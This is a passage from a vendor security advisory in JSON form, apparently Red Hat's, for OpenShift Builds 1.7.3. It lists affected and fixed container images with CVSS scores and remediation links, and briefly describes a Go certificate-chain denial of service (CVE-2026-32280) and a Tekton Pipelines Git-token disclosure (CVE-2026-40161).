"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2456339"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32280"
},
{
"category": "external",
"summary": "RHBZ#2456339",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
},
{
"category": "external",
"summary": "https://go.dev/cl/758320",
"url": "https://go.dev/cl/758320"
},
{
"category": "external",
"summary": "https://go.dev/issue/78282",
"url": "https://go.dev/issue/78282"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
"url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4947",
"url": "https://pkg.go.dev/vuln/GO-2026-4947"
}
],
"release_date": "2026-04-08T01:06:58.595000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T05:19:34+00:00",
"details": "It is recommended that existing users of Red Hat OpenShift Builds 1.7.2 upgrade to 1.7.3",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24359"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
},
{
"cve": "CVE-2026-40161",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2026-04-21T17:02:07.015859+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460173"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines. A tenant with permissions to create TaskRun or PipelineRun resources can exploit this vulnerability. By omitting the Git API token parameter and pointing the serverURL to an attacker-controlled endpoint, the system-configured Git API token (such as a GitHub Personal Access Token or GitLab token) can be sent to the attacker. This information disclosure allows for the exfiltration of sensitive API tokens.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure of Git API token via user-controlled serverURL",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact information disclosure flaw affects Tekton Pipelines. A user with permissions to create TaskRun or PipelineRun resources could exfiltrate the system-configured Git API token by directing the serverURL to an attacker-controlled endpoint and omitting the token parameter. This vulnerability doesn\u0027t affect a couple of Red Hat supported products as it\u0027s using a Pipelines version previously from 1.0.0, where the affected code is not present.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
